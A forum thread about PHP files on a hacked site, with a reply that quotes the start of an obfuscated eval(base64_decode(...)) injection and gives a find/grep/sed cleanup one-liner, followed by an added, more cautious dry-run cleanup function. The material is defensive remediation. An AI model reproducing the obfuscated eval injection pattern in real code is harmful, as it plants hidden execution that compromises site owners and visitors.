Forum Replies Created

Viewing 2 replies - 1 through 2 (of 2 total)
  • Oh and of course I called GoDaddy Support but they said it was because of me using scripts or insecure passwords, certainly no issue on their side.

    I had the same problem, don’t know when it started. Since I didn’t know if my last file backup was current enough (had been modifying themes), I decided to try and write a cleanup script:

    My hacked PHP files start with:

    <?php /**/ eval(base64_decode("JGs9MTQ4OyRtPWV4cGxvZGUoIjsiLCIyNTM7MjQyOzE4ODsyNDI7MjI1OzI1MDsyNDc7MjI0OzI1MzsyNTE7MjUwOzIwMzsyNDE7MjM2OzI1MzsyMzE7MjI0OzIzMTsxODg7MTc5OzI1MTsyNDY7MjAzOzIzMTsyMjQ7MjQ1OzIzM

    So I searched for JGs9MTQ4OyRtPWV4cGx in all PHP files and then deleted the first line of each matching file (using an SSH session).

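    # Delete line 1 of every .php file that contains the marker (NUL-delimited so paths with spaces survive)
    find . -type f -name "*.php" -print0 | xargs -0 -r grep -lZ "JGs9MTQ4OyRtPWV4cGx" | xargs -0 -r sed -i '1d'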

    Hope this helps you. I will however remove the whole site soon and put a clean site backup just to be sure. And immediately change all passwords.
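
A more guarded variant of the cleanup in the post above, added here as an example and not part of the original post: it defaults to a dry run, copies each infected file to a quarantine directory first, and deletes line 1 only when that line itself carries the marker. The function name `clean_injected`, the quarantine path argument and the `.infected` suffix are assumptions; GNU `sed -i` is assumed, and file names containing newlines are not handled.

```shell
# Marker is the base64 prefix quoted in the post.
MARKER="JGs9MTQ4OyRtPWV4cGx"

# clean_injected ROOT QUARANTINE [apply]   (hypothetical helper)
# Prints "CLEAN <file>"  when line 1 carries the marker,
#        "REVIEW <file>" when the marker appears only elsewhere in the file.
# Nothing is modified unless the third argument is "apply".
clean_injected() (
    root=$1
    quarantine=$2
    mode=${3:-dry-run}

    # List every .php file under ROOT that contains the marker anywhere.
    find "$root" -type f -name '*.php' -exec grep -l -- "$MARKER" {} + |
    while IFS= read -r f; do
        if head -n 1 "$f" | grep -q -- "$MARKER"; then
            echo "CLEAN $f"
            if [ "$mode" = "apply" ]; then
                # Keep the infected original outside the web root for later
                # analysis, under a name the web server will not execute.
                rel=${f#"$root"/}
                mkdir -p "$quarantine/$(dirname "$rel")"
                cp -p "$f" "$quarantine/$rel.infected"
                # Delete line 1 only if it still matches the marker.
                sed -i -e "1{/$MARKER/d;}" "$f"
            fi
        else
            # Marker is somewhere other than line 1: blindly deleting line 1
            # would remove legitimate code and leave the injection in place.
            echo "REVIEW $f"
        fi
    done
)
```

Run it once without `apply` and read the `CLEAN`/`REVIEW` list before letting it change anything.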
